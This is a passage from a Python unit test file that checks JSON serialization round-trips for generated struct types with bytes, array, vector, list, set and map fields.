self.assertEqual(struct2.f35, struct1.f35)
self.assertEqual(struct2.f36, struct1.f36)
self.assertEqual(struct2.f37, struct1.f37)
self.assertEqual(struct2.f38, struct1.f38)
self.assertEqual(struct2.f39, struct1.f39)
self.assertEqual(struct2.f40, struct1.f40)
self.assertEqual(struct2.f100, struct1.f100)
self.assertEqual(struct2.f101, struct1.f101)
self.assertEqual(struct2.f102, struct1.f102)
self.assertEqual(struct2.f103, struct1.f103)
self.assertEqual(struct2.f104, struct1.f104)
self.assertEqual(struct2.f105, struct1.f105)
self.assertEqual(struct2.f106, struct1.f106)
self.assertEqual(struct2.f107, struct1.f107)
self.assertEqual(struct2.f108, struct1.f108)
self.assertEqual(struct2.f109, struct1.f109)
self.assertEqual(struct2.f110, struct1.f110)
self.assertEqual(struct2.f111, struct1.f111)
self.assertEqual(struct2.f112, struct1.f112)
self.assertEqual(struct2.f113, struct1.f113)
self.assertEqual(struct2.f114, struct1.f114)
self.assertEqual(struct2.f115, struct1.f115)
self.assertEqual(struct2.f116, struct1.f116)
self.assertEqual(struct2.f117, struct1.f117)
self.assertEqual(struct2.f118, struct1.f118)
self.assertEqual(struct2.f119, struct1.f119)
self.assertEqual(struct2.f120, struct1.f120)
self.assertEqual(struct2.f121, struct1.f121)
self.assertEqual(struct2.f122, struct1.f122)
self.assertEqual(struct2.f123, struct1.f123)
self.assertEqual(struct2.f124, struct1.f124)
self.assertEqual(struct2.f125, struct1.f125)
self.assertEqual(struct2.f126, struct1.f126)
self.assertEqual(struct2.f127, struct1.f127)
self.assertEqual(struct2.f128, struct1.f128)
self.assertEqual(struct2.f129, struct1.f129)
self.assertEqual(struct2.f130, struct1.f130)
self.assertEqual(struct2.f131, struct1.f131)
self.assertEqual(struct2.f132, struct1.f132)
self.assertEqual(struct2.f133, struct1.f133)
self.assertEqual(struct2.f134, struct1.f134)
self.assertEqual(struct2.f135, struct1.f135)
self.assertEqual(struct2.f136, struct1.f136)
self.assertLess(abs(struct2.f137 - struct1.f137), 0.0001)
self.assertEqual(struct2.f138, struct1.f138)
self.assertEqual(struct2.f139, struct1.f139)
self.assertLess(abs(struct2.f140 - struct1.f140), 1e+123)
self.assertEqual(struct2.f141, struct1.f141)
self.assertEqual(struct2.f142, struct1.f142)
self.assertEqual(struct2.f143, struct1.f143)
self.assertEqual(struct2.f144, struct1.f144)
self.assertEqual(struct2.f145, struct1.f145)
self.assertEqual(struct2.f146, struct1.f146)
self.assertEqual(struct2.f147, struct1.f147)
self.assertEqual(struct2.f148, struct1.f148)
self.assertEqual(struct2.f149, struct1.f149)
self.assertEqual(struct2.f150, struct1.f150)
self.assertEqual(struct2.f151, struct1.f151)
self.assertEqual(struct2.f152, struct1.f152)
self.assertEqual(struct2.f153, struct1.f153)
self.assertEqual(struct2.f154, struct1.f154)
self.assertEqual(struct2.f155, struct1.f155)
self.assertEqual(struct2.f156, struct1.f156)
self.assertEqual(struct2.f157, struct1.f157)
self.assertEqual(struct2.f1000, struct1.f1000)
self.assertEqual(struct2.f1001, struct1.f1001)
self.assertEqual(struct2.f1002, struct1.f1002)
self.assertEqual(struct2.f1003, struct1.f1003)
self.assertEqual(struct2.f1004, struct1.f1004)
self.assertEqual(struct2.f1005, struct1.f1005)
self.assertEqual(struct2.f1006, struct1.f1006)
self.assertEqual(struct2.f1007, struct1.f1007)
def test_serialization_json_struct_bytes(self):
# Define a source JSON string
json = r'{"f1":"QUJD","f2":"dGVzdA==","f3":null}'
# Create a new struct from the source JSON string
struct1 = test.StructBytes.from_json(json)
# Serialize the struct to the JSON string
json = struct1.to_json()
# Check the serialized JSON size
self.assertGreater(len(json), 0)
# Deserialize the struct from the JSON string
struct2 = test.StructBytes.from_json(json)
self.assertEqual(len(struct2.f1), 3)
self.assertEqual(chr(struct2.f1[0]), 'A')
self.assertEqual(chr(struct2.f1[1]), 'B')
self.assertEqual(chr(struct2.f1[2]), 'C')
self.assertNotEqual(struct2.f2, None)
self.assertEqual(len(struct2.f2), 4)
self.assertEqual(chr(struct2.f2[0]), 't')
self.assertEqual(chr(struct2.f2[1]), 'e')
self.assertEqual(chr(struct2.f2[2]), 's')
self.assertEqual(chr(struct2.f2[3]), 't')
self.assertEqual(struct2.f3, None)
def test_serialization_json_struct_array(self):
# Define a source JSON string
json = r'{"f1":[48,65],"f2":[97,null],"f3":["MDAw","QUFB"],"f4":["YWFh",null],"f5":[1,2],"f6":[1,null],"f7":[3,7],"f8":[3,null],"f9":[{"id":0,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543145986060361000,"f36":"00000000-0000-0000-0000-000000000000","f37":"cedcad98-f0a6-11e8-9f47-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]}},{"id":0,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543145986060910000,"f36":"00000000-0000-0000-0000-000000000000","f37":"cedcc274-f0a6-11e8-9f47-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]}}],"f10":[{"id":0,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543145986061436000,"f36":"00000000-0000-0000-0000-000000000000","f37":"cedcd714-f0a6-11e8-9f47-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]}},null]}'
# Create a new struct from the source JSON string
struct1 = test.StructArray.from_json(json)
# Serialize the struct to the JSON string
json = struct1.to_json()
# Check the serialized JSON size
self.assertGreater(len(json), 0)
# Deserialize the struct from the JSON string
struct2 = test.StructArray.from_json(json)
self.assertEqual(len(struct2.f1), 2)
self.assertEqual(struct2.f1[0], 48)
self.assertEqual(struct2.f1[1], 65)
self.assertEqual(len(struct2.f2), 2)
self.assertEqual(struct2.f2[0], 97)
self.assertEqual(struct2.f2[1], None)
self.assertEqual(len(struct2.f3), 2)
self.assertEqual(len(struct2.f3[0]), 3)
self.assertEqual(struct2.f3[0][0], 48)
self.assertEqual(struct2.f3[0][1], 48)
self.assertEqual(struct2.f3[0][2], 48)
self.assertEqual(len(struct2.f3[1]), 3)
self.assertEqual(struct2.f3[1][0], 65)
self.assertEqual(struct2.f3[1][1], 65)
self.assertEqual(struct2.f3[1][2], 65)
self.assertEqual(len(struct2.f4), 2)
self.assertNotEqual(struct2.f4[0], None)
self.assertEqual(len(struct2.f4[0]), 3)
self.assertEqual(struct2.f4[0][0], 97)
self.assertEqual(struct2.f4[0][1], 97)
self.assertEqual(struct2.f4[0][2], 97)
self.assertEqual(struct2.f4[1], None)
self.assertEqual(len(struct2.f5), 2)
self.assertEqual(struct2.f5[0], test.EnumSimple.ENUM_VALUE_1)
self.assertEqual(struct2.f5[1], test.EnumSimple.ENUM_VALUE_2)
self.assertEqual(len(struct2.f6), 2)
self.assertEqual(struct2.f6[0], test.EnumSimple.ENUM_VALUE_1)
self.assertEqual(struct2.f6[1], None)
self.assertEqual(len(struct2.f7), 2)
self.assertEqual(struct2.f7[0], test.FlagsSimple.FLAG_VALUE_1 | test.FlagsSimple.FLAG_VALUE_2)
self.assertEqual(struct2.f7[1], test.FlagsSimple.FLAG_VALUE_1 | test.FlagsSimple.FLAG_VALUE_2 | test.FlagsSimple.FLAG_VALUE_3)
self.assertEqual(len(struct2.f8), 2)
self.assertEqual(struct2.f8[0], test.FlagsSimple.FLAG_VALUE_1 | test.FlagsSimple.FLAG_VALUE_2)
self.assertEqual(struct2.f8[1], None)
self.assertEqual(len(struct2.f9), 2)
self.assertEqual(struct2.f9[0].f2, True)
self.assertEqual(struct2.f9[0].f12, 0xFF)
self.assertEqual(struct2.f9[0].f32, "Initial string!")
self.assertEqual(struct2.f9[1].f2, True)
self.assertEqual(struct2.f9[1].f12, 0xFF)
self.assertEqual(struct2.f9[1].f32, "Initial string!")
self.assertEqual(len(struct2.f10), 2)
self.assertNotEqual(struct2.f10[0], None)
self.assertEqual(struct2.f10[0].f2, True)
self.assertEqual(struct2.f10[0].f12, 0xFF)
self.assertEqual(struct2.f10[0].f32, "Initial string!")
self.assertEqual(struct2.f10[1], None)
def test_serialization_json_struct_vector(self):
# Define a source JSON string
json = r'{"f1":[48,65],"f2":[97,null],"f3":["MDAw","QUFB"],"f4":["YWFh",null],"f5":[1,2],"f6":[1,null],"f7":[3,7],"f8":[3,null],"f9":[{"id":0,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543146157127964000,"f36":"00000000-0000-0000-0000-000000000000","f37":"34d38702-f0a7-11e8-b30e-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]}},{"id":0,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543146157128572000,"f36":"00000000-0000-0000-0000-000000000000","f37":"34d39c88-f0a7-11e8-b30e-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]}}],"f10":[{"id":0,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543146157129063000,"f36":"00000000-0000-0000-0000-000000000000","f37":"34d3b038-f0a7-11e8-b30e-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]}},null]}'
# Create a new struct from the source JSON string
struct1 = test.StructVector.from_json(json)
# Serialize the struct to the JSON string
json = struct1.to_json()
# Check the serialized JSON size
self.assertGreater(len(json), 0)
# Deserialize the struct from the JSON string
struct2 = test.StructVector.from_json(json)
self.assertEqual(len(struct2.f1), 2)
self.assertEqual(struct2.f1[0], 48)
self.assertEqual(struct2.f1[1], 65)
self.assertEqual(len(struct2.f2), 2)
self.assertEqual(struct2.f2[0], 97)
self.assertEqual(struct2.f2[1], None)
self.assertEqual(len(struct2.f3), 2)
self.assertEqual(len(struct2.f3[0]), 3)
self.assertEqual(struct2.f3[0][0], 48)
self.assertEqual(struct2.f3[0][1], 48)
self.assertEqual(struct2.f3[0][2], 48)
self.assertEqual(len(struct2.f3[1]), 3)
self.assertEqual(struct2.f3[1][0], 65)
self.assertEqual(struct2.f3[1][1], 65)
self.assertEqual(struct2.f3[1][2], 65)
self.assertEqual(len(struct2.f4), 2)
self.assertNotEqual(struct2.f4[0], None)
self.assertEqual(len(struct2.f4[0]), 3)
self.assertEqual(struct2.f4[0][0], 97)
self.assertEqual(struct2.f4[0][1], 97)
self.assertEqual(struct2.f4[0][2], 97)
self.assertEqual(struct2.f4[1], None)
self.assertEqual(len(struct2.f5), 2)
self.assertEqual(struct2.f5[0], test.EnumSimple.ENUM_VALUE_1)
self.assertEqual(struct2.f5[1], test.EnumSimple.ENUM_VALUE_2)
self.assertEqual(len(struct2.f6), 2)
self.assertEqual(struct2.f6[0], test.EnumSimple.ENUM_VALUE_1)
self.assertEqual(struct2.f6[1], None)
self.assertEqual(len(struct2.f7), 2)
self.assertEqual(struct2.f7[0], test.FlagsSimple.FLAG_VALUE_1 | test.FlagsSimple.FLAG_VALUE_2)
self.assertEqual(struct2.f7[1], test.FlagsSimple.FLAG_VALUE_1 | test.FlagsSimple.FLAG_VALUE_2 | test.FlagsSimple.FLAG_VALUE_3)
self.assertEqual(len(struct2.f8), 2)
self.assertEqual(struct2.f8[0], test.FlagsSimple.FLAG_VALUE_1 | test.FlagsSimple.FLAG_VALUE_2)
self.assertEqual(struct2.f8[1], None)
self.assertEqual(len(struct2.f9), 2)
self.assertEqual(struct2.f9[0].f2, True)
self.assertEqual(struct2.f9[0].f12, 0xFF)
self.assertEqual(struct2.f9[0].f32, "Initial string!")
self.assertEqual(struct2.f9[1].f2, True)
self.assertEqual(struct2.f9[1].f12, 0xFF)
self.assertEqual(struct2.f9[1].f32, "Initial string!")
self.assertEqual(len(struct2.f10), 2)
self.assertNotEqual(struct2.f10[0], None)
self.assertEqual(struct2.f10[0].f2, True)
self.assertEqual(struct2.f10[0].f12, 0xFF)
self.assertEqual(struct2.f10[0].f32, "Initial string!")
self.assertEqual(struct2.f10[1], None)
def test_serialization_json_struct_list(self):
# Define a source JSON string
json = r'{"f1":[48,65],"f2":[97,null],"f3":["MDAw","QUFB"],"f4":["YWFh",null],"f5":[1,2],"f6":[1,null],"f7":[3,7],"f8":[3,null],"f9":[{"id":0,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543146220253760000,"f36":"00000000-0000-0000-0000-000000000000","f37":"5a73e7fe-f0a7-11e8-89e6-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]}},{"id":0,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543146220255725000,"f36":"00000000-0000-0000-0000-000000000000","f37":"5a741990-f0a7-11e8-89e6-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]}}],"f10":[{"id":0,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543146220256802000,"f36":"00000000-0000-0000-0000-000000000000","f37":"5a74e4b0-f0a7-11e8-89e6-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]}},null]}'
# Create a new struct from the source JSON string
struct1 = test.StructList.from_json(json)
# Serialize the struct to the JSON string
json = struct1.to_json()
# Check the serialized JSON size
self.assertGreater(len(json), 0)
# Deserialize the struct from the JSON string
struct2 = test.StructList.from_json(json)
self.assertEqual(len(struct2.f1), 2)
self.assertEqual(struct2.f1[0], 48)
self.assertEqual(struct2.f1[1], 65)
self.assertEqual(len(struct2.f2), 2)
self.assertEqual(struct2.f2[0], 97)
self.assertEqual(struct2.f2[1], None)
self.assertEqual(len(struct2.f3), 2)
self.assertEqual(len(struct2.f3[0]), 3)
self.assertEqual(struct2.f3[0][0], 48)
self.assertEqual(struct2.f3[0][1], 48)
self.assertEqual(struct2.f3[0][2], 48)
self.assertEqual(len(struct2.f3[1]), 3)
self.assertEqual(struct2.f3[1][0], 65)
self.assertEqual(struct2.f3[1][1], 65)
self.assertEqual(struct2.f3[1][2], 65)
self.assertEqual(len(struct2.f4), 2)
self.assertNotEqual(struct2.f4[0], None)
self.assertEqual(len(struct2.f4[0]), 3)
self.assertEqual(struct2.f4[0][0], 97)
self.assertEqual(struct2.f4[0][1], 97)
self.assertEqual(struct2.f4[0][2], 97)
self.assertEqual(struct2.f4[1], None)
self.assertEqual(len(struct2.f5), 2)
self.assertEqual(struct2.f5[0], test.EnumSimple.ENUM_VALUE_1)
self.assertEqual(struct2.f5[1], test.EnumSimple.ENUM_VALUE_2)
self.assertEqual(len(struct2.f6), 2)
self.assertEqual(struct2.f6[0], test.EnumSimple.ENUM_VALUE_1)
self.assertEqual(struct2.f6[1], None)
self.assertEqual(len(struct2.f7), 2)
self.assertEqual(struct2.f7[0], test.FlagsSimple.FLAG_VALUE_1 | test.FlagsSimple.FLAG_VALUE_2)
self.assertEqual(struct2.f7[1], test.FlagsSimple.FLAG_VALUE_1 | test.FlagsSimple.FLAG_VALUE_2 | test.FlagsSimple.FLAG_VALUE_3)
self.assertEqual(len(struct2.f8), 2)
self.assertEqual(struct2.f8[0], test.FlagsSimple.FLAG_VALUE_1 | test.FlagsSimple.FLAG_VALUE_2)
self.assertEqual(struct2.f8[1], None)
self.assertEqual(len(struct2.f9), 2)
self.assertEqual(struct2.f9[0].f2, True)
self.assertEqual(struct2.f9[0].f12, 0xFF)
self.assertEqual(struct2.f9[0].f32, "Initial string!")
self.assertEqual(struct2.f9[1].f2, True)
self.assertEqual(struct2.f9[1].f12, 0xFF)
self.assertEqual(struct2.f9[1].f32, "Initial string!")
self.assertEqual(len(struct2.f10), 2)
self.assertNotEqual(struct2.f10[0], None)
self.assertEqual(struct2.f10[0].f2, True)
self.assertEqual(struct2.f10[0].f12, 0xFF)
self.assertEqual(struct2.f10[0].f32, "Initial string!")
self.assertEqual(struct2.f10[1], None)
def test_serialization_json_struct_set(self):
# Define a source JSON string
json = r'{"f1":[48,65,97],"f2":[1,2],"f3":[3,7],"f4":[{"id":48,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543146299848353000,"f36":"00000000-0000-0000-0000-000000000000","f37":"89e4edd0-f0a7-11e8-9dde-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]}},{"id":65,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543146299848966000,"f36":"00000000-0000-0000-0000-000000000000","f37":"89e503f6-f0a7-11e8-9dde-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]}}]}'
# Create a new struct from the source JSON string
struct1 = test.StructSet.from_json(json)
# Serialize the struct to the JSON string
json = struct1.to_json()
# Check the serialized JSON size
self.assertGreater(len(json), 0)
# Deserialize the struct from the JSON string
struct2 = test.StructSet.from_json(json)
self.assertEqual(len(struct2.f1), 3)
self.assertTrue(48 in struct2.f1)
self.assertTrue(65 in struct2.f1)
self.assertTrue(97 in struct2.f1)
self.assertEqual(len(struct2.f2), 2)
self.assertTrue(test.EnumSimple.ENUM_VALUE_1 in struct2.f2)
self.assertTrue(test.EnumSimple.ENUM_VALUE_2 in struct2.f2)
self.assertEqual(len(struct2.f3), 2)
self.assertTrue((test.FlagsSimple.FLAG_VALUE_1 | test.FlagsSimple.FLAG_VALUE_2) in struct2.f3)
self.assertTrue((test.FlagsSimple.FLAG_VALUE_1 | test.FlagsSimple.FLAG_VALUE_2 | test.FlagsSimple.FLAG_VALUE_3) in struct2.f3)
self.assertEqual(len(struct2.f4), 2)
s1 = test.StructSimple()
s1.id = 48
self.assertTrue(s1 in struct2.f4)
s2 = test.StructSimple()
s2.id = 65
self.assertTrue(s2 in struct2.f4)
def test_serialization_json_struct_map(self):
# Define a source JSON string
json = r'{"f1":{"10":48,"20":65},"f2":{"10":97,"20":null},"f3":{"10":"MDAw","20":"QUFB"},"f4":{"10":"YWFh","20":null},"f5":{"10":1,"20":2},"f6":{"10":1,"20":null},"f7":{"10":3,"20":7},"f8":{"10":3,"20":null},"f9":{"10":{"id":48,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543146345803483000,"f36":"00000000-0000-0000-0000-000000000000","f37":"a549215e-f0a7-11e8-90f6-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]}},"20":{"id":65,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543146345804184000,"f36":"00000000-0000-0000-0000-000000000000","f37":"a54942ce-f0a7-11e8-90f6-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]}}},"f10":{"10":{"id":48,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543146345803483000,"f36":"00000000-0000-0000-0000-000000000000","f37":"a549215e-f0a7-11e8-90f6-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]}},"20":null}}'
# Create a new struct from the source JSON string
struct1 = test.StructMap.from_json(json)
# Serialize the struct to the JSON string
json = struct1.to_json()
# Check the serialized JSON size
self.assertGreater(len(json), 0)
# Deserialize the struct from the JSON string
struct2 = test.StructMap.from_json(json)
self.assertEqual(len(struct2.f1), 2)
self.assertEqual(struct2.f1["10"], 48)
self.assertEqual(struct2.f1["20"], 65)
self.assertEqual(len(struct2.f2), 2)
self.assertEqual(struct2.f2["10"], 97)
self.assertEqual(struct2.f2["20"], None)
self.assertEqual(len(struct2.f3), 2)
self.assertEqual(len(struct2.f3["10"]), 3)
self.assertEqual(len(struct2.f3["20"]), 3)
self.assertEqual(len(struct2.f4), 2)
self.assertEqual(len(struct2.f4["10"]), 3)
self.assertEqual(struct2.f4["20"], None)
self.assertEqual(len(struct2.f5), 2)
self.assertEqual(struct2.f5["10"], test.EnumSimple.ENUM_VALUE_1)
self.assertEqual(struct2.f5["20"], test.EnumSimple.ENUM_VALUE_2)
self.assertEqual(len(struct2.f6), 2)
self.assertEqual(struct2.f6["10"], test.EnumSimple.ENUM_VALUE_1)
self.assertEqual(struct2.f6["20"], None)
self.assertEqual(len(struct2.f7), 2)
self.assertEqual(struct2.f7["10"], test.FlagsSimple.FLAG_VALUE_1 | test.FlagsSimple.FLAG_VALUE_2)
self.assertEqual(struct2.f7["20"], test.FlagsSimple.FLAG_VALUE_1 | test.FlagsSimple.FLAG_VALUE_2 | test.FlagsSimple.FLAG_VALUE_3)
self.assertEqual(len(struct2.f8), 2)
self.assertEqual(struct2.f8["10"], test.FlagsSimple.FLAG_VALUE_1 | test.FlagsSimple.FLAG_VALUE_2)
